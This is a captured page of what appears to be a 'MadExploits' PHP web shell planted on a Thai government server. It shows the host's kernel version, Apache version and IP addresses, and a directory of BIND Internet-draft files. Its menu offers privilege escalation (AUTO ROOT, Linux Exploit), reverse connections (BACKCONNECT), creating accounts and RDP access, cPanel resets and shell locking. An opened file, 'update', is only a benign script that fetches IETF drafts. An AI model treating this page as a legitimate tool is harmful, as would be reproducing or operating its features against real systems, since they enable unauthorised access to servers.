Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
bind-9.8.2 /
draft /
[ HOME SHELL ]
Name
Size
Permission
Action
draft-faltstrom-uri-06.txt
25.4
KB
-rw-r--r--
draft-ietf-6man-text-addr-repr...
26.33
KB
-rw-r--r--
draft-ietf-behave-address-form...
39.77
KB
-rw-r--r--
draft-ietf-behave-dns64-11.txt
74.26
KB
-rw-r--r--
draft-ietf-dnsext-axfr-clarify...
64.79
KB
-rw-r--r--
draft-ietf-dnsext-dns-tcp-requ...
16.18
KB
-rw-r--r--
draft-ietf-dnsext-dnssec-bis-u...
31.33
KB
-rw-r--r--
draft-ietf-dnsext-dnssec-regis...
17.29
KB
-rw-r--r--
draft-ietf-dnsext-ecc-key-07.t...
33.32
KB
-rw-r--r--
draft-ietf-dnsext-interop3597-...
8.37
KB
-rw-r--r--
draft-ietf-dnsext-rfc2671bis-e...
26.51
KB
-rw-r--r--
draft-ietf-dnsext-rfc2672bis-d...
36.92
KB
-rw-r--r--
draft-ietf-dnsext-rfc3597-bis-...
17.1
KB
-rw-r--r--
draft-ietf-dnsext-tsig-md5-dep...
10.04
KB
-rw-r--r--
draft-ietf-dnsop-bad-dns-res-0...
45.62
KB
-rw-r--r--
draft-ietf-dnsop-dnssec-key-ti...
69.65
KB
-rw-r--r--
draft-ietf-dnsop-dnssec-trust-...
20.25
KB
-rw-r--r--
draft-ietf-dnsop-inaddr-requir...
14.82
KB
-rw-r--r--
draft-ietf-dnsop-name-server-m...
35.2
KB
-rw-r--r--
draft-ietf-dnsop-respsize-06.t...
25.01
KB
-rw-r--r--
draft-kato-dnsop-local-zones-0...
8.44
KB
-rw-r--r--
draft-kerr-ixfr-only-01.txt
10.76
KB
-rw-r--r--
draft-mekking-dnsop-auto-cpsyn...
11.41
KB
-rw-r--r--
draft-yao-dnsext-bname-04.txt
26.57
KB
-rw-r--r--
update
670
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : update
#!/bin/sh commit= for i do z=`expr "$i" : 'http://www.ietf.org/internet-drafts/\(.*\)'` if test -n "$z" then i="$z" fi if test -f "$i" then continue fi pat=`echo "$i" | sed 's/...txt/??.txt/'` old=`echo $pat 2> /dev/null` if test "X$old" != "X$pat" then newer=0 for j in $old do if test $j ">" $i then newer=1 fi done if test $newer = 1 then continue; fi fi if fetch "http://www.ietf.org/internet-drafts/$i" then cvs add "$i" if test "X$old" != "X$pat" then rm $old cvs delete $old commit="$commit $old" fi commit="$commit $i" fi done if test -n "$commit" then cvs commit -m "new draft" $commit fi
Close